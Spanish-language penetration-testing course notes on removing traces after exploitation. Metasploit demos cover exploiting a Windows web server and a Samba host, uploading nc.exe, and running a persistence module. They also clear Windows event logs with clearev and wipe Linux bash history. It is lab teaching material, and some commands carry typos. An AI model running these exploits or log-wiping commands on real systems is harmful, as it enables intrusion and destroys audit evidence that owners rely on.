Clearing

Clearing Your Tracks On Windows

Las fases de explotación y post-explotación de una prueba de penetración implican interactuar activamente con los sistemas de destino y los datos almacenados en estos sistemas.

Como resultado, es posible que se le solicite que borre o deshaga los cambios que haya realizado en los sistemas de destino que ha comprometido según las pautas especificadas en las reglas de interacción.

Si ha transferido archivos a los sistemas de destino que ha comprometido, lleve un registro de dónde se han guardado para poder eliminarlos cuando haya terminado.

Una buena práctica es almacenar todos sus scripts, exploits y binarios en el directorio C:/Temp en Windows y en el directorio /tmp en Linux.

También es importante tener en cuenta el marco de explotación que se está utilizando; un ejemplo de esto es MSF, que es conocido por generar y almacenar artefactos en el sistema de destino cuando se utilizan módulos de explotación o post.

Algunos módulos MSF bien diseñados le proporcionan instrucciones y secuencias de comandos de recursos que le proporcionan información sobre dónde se almacenan los artefactos y cómo se pueden eliminar.

En el contexto de Windows, una técnica típica de postexplotación pertinente para limpiar sus huellas es eliminar el Registro de eventos de Windows. Esto es algo que se debe evitar durante una prueba de penetración, ya que el Registro de eventos de Windows almacena una gran cantidad de datos que son importantes para el cliente para el que se está realizando la prueba de penetración.

Demo: Clearing Your Tracks On Windows

# Explotamos la maquina de la victima
msf6 exploit(windows/http/badbtue_passthru) > exploit
meterpreter > sysinfo
meterpreter > getuid
# Crear un directorio temporal en la unidad C y acceder al mismo
meterpreter > pwd
C:\Temp
meterpreter > upload /usr/share/windows-binaries/nc.exe
meterpreter > ls
meterpreter > rm nc.exe
meterpreter > ls

msf6 exploit (windows/httplbadbtue passthru) > search persistence platform:windows
msf6 exploit (windows/httplbadbtue passthru) > use 2
msf6 exploit (windows/httplbadbtue passthru) > explolit
# Cuando se ejecuta el exploit podra ver que le proporciona
# informacion para limpiar lo que creo el mismo
# eso incluye servicios ejecutables y cualquier otro rastro
# NO SE RECOMIENDA DEJAR RASTROS DEBIDO A QUE OTRO ATACANTE LO PUEDE APROVECHAR
# conocer bien de todos los artefactos que se crean
# Para ejectar el comando
resource cleanup.rc

# Limpiar los eventos de eventViewer de windos
meterpreter > clearev

Quiz: Clearing Your Tracks On Windows

Clearing Your Tracks On Linux

Demo: Clearing Your Tracks On Linux

nmap -sV -p 445 192.143.174.3

msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
msf5 exploit(linux/samba/is_known_pipename) > exploit
/bin/bash -i

root@victim-l:/# cd /tmp
root@victim-l:/tmp# ls

# Normalmente se alacaneara el historial de comandos en el archivo
.nashrc

root@victim-l:/root# echo "1 cd /tmp" > .bash_history

# Borrar el historial de comandos
history -c

# Tambien puede ejecutar el siguiente comando
root@victim-l:/root# cat /dev/null > .bash_history
history -c

Quiz: Clearing Your Tracks On Linux